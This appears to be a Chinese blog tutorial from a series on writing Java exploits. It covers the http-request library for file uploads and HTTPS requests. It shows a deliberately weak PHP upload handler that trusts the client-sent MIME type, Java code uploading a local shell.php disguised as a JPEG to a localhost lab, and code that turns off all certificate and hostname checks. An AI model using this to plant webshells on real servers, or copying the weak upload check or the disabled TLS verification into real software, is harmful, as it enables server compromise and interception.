JAVA-Exploit编写(6)--http-request库文件上传使用

内心如初2025-01-19 8:47

目录

1.http-request简介

[2. 依赖导入](#2. 依赖导入)

3.文件上传页面代码

[4. http-request文件上传简单使用](#4. http-request文件上传简单使用)

5.请求https的网站解决SSL证书的问题

[5. 1 直接请求带https域名的网站](#5. 1 直接请求带https域名的网站)

[5.2 信任所有证书](#5.2 信任所有证书)

1.http-request简介

http-request 是一个库 里面提供很多方法,使得很容易就可以构造http请求,相比于之前使用的标准库类等要简单使用很多,目前通过此库来编写EXP较多.

2. 依赖导入

bash 复制代码 
<dependency>
      <groupId>com.github.kevinsawicki</groupId>
      <artifactId>http-request</artifactId>
      <version>5.6</version>
</dependency>

3.文件上传页面代码

php 复制代码 
<?php
if (($_FILES["file"]["type"] == "image/gif" || $_FILES["file"]["type"] == "image/jpeg" || $_FILES["file"]["type"] == "image/png") && $_FILES["file"]["size"] < 20000) {
    if ($_FILES["file"]["error"] > 0) {
        echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
        echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    } else {
        if (file_exists("uploads/" . $_FILES["file"]["name"])) {
            echo $_FILES["file"]["name"] . " already exists. ";
        } else {
            move_uploaded_file($_FILES["file"]["tmp_name"], "uploads/" . $_FILES["file"]["name"]);
            echo "Stored in: " . "uploads/" . $_FILES["file"]["name"];
        }
    }
} else {
    echo "Invalid file";
}
?>

4. http-request文件上传简单使用

相比于之前使用的标准库和httpcomponents库来说,使用起来简单很多,通过设置文件头和.part方法即可,一看就懂.

java 复制代码 
package com.deger.HttpRequest;

import com.github.kevinsawicki.http.HttpRequest;

import java.io.File;

public class HttpRequestUpload {
    public static void main(String[] args) {
        // 文件上传
        HttpRequest httpRequest = HttpRequest.post("http://127.0.0.1/upload.php");
        // 设置请求头的文件类型
        httpRequest.header( "content-Type","multipart/form-data;boundary=AaB03x");
        // 设置上传的文件 以及上传文件位置
        httpRequest.part("file","test123.php","image/jpeg",new File("D:\\phpstudy_pro\\WWW\\shell.php"));
        // 接收响应信息
        System.out.println(httpRequest.body());

    }
}

5.请求https的网站解决SSL证书的问题

5. 1 直接请求带https域名的网站

java 复制代码 
package com.deger.HttpRequest;


import com.github.kevinsawicki.http.HttpRequest;

public class HttpRequestSsl {
    public static void main(String[] args) {
        HttpRequest httpRequest = HttpRequest.get("https://www.xxxxxx.com");
        System.out.println(httpRequest.body());
    }
}

5.2 信任所有证书

只需要使用两个方法就可以正常使用了

java 复制代码 
package com.deger.HttpRequest;


import com.github.kevinsawicki.http.HttpRequest;

public class HttpRequestSsl {
    public static void main(String[] args) {
        HttpRequest httpRequest = HttpRequest.get("https://www.xxxxx.com");
        //信息所有证书和主机
        httpRequest.trustAllCerts();
        httpRequest.trustAllHosts();
        System.out.println(httpRequest.body());
    }
}
相关推荐
掉鱼的猫3 小时前
全球首个支持 IETF JSONPath (RFC 9535) 标准的 Java 框架,Snack4-Jsonpath v4.0.0 发布
java·json
赶飞机偏偏下雨3 小时前
【Java笔记】消息队列
java·开发语言·笔记
豐儀麟阁贵3 小时前
2.6 代码注释与编码规
java·开发语言
程序员三明治3 小时前
【Mybatis从入门到入土】ResultMap映射、多表查询与缓存机制全解析
java·sql·缓存·mybatis·resultmap·缓存机制·多表查询
华仔啊3 小时前
Java 重试机制没写对,线上很容易出问题!这份生产级方案请收好
java·后端
你不是我我3 小时前
【Java 开发日记】什么是线程池?它的工作原理?
java·开发语言
Seven973 小时前
剑指offer-35、数组中的逆序对
java·leetcode
梵得儿SHI4 小时前
Java 反射机制深度解析:从运行时 “解剖” 类的底层逻辑
java·开发语言·反射·反射机制·private·类成员·反射的三大核心功能
豆沙沙包?4 小时前
2025年--Lc188--931. 下降路径最小和(多维动态规划,矩阵)--Java版
java·矩阵·动态规划
JAVA学习通4 小时前
Spring AI 1.0 GA 深度解析:Java生态的AI革命已来
java·人工智能·spring·springai
热门推荐
01GitHub 镜像站点02两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答03BongoCat - 跨平台键盘猫动画工具04UV安装并设置国内源05GitLab 零基础入门指南:从安装到项目管理全流程06Linux下V2Ray安装配置指南07windows找不到gpedit.msc(本地组策略编辑器)0846个Nano-banana 精选提示词,持续更新中09Labelme从安装到标注:零基础完整指南102025 最新教程:注册并切换到美区 Apple ID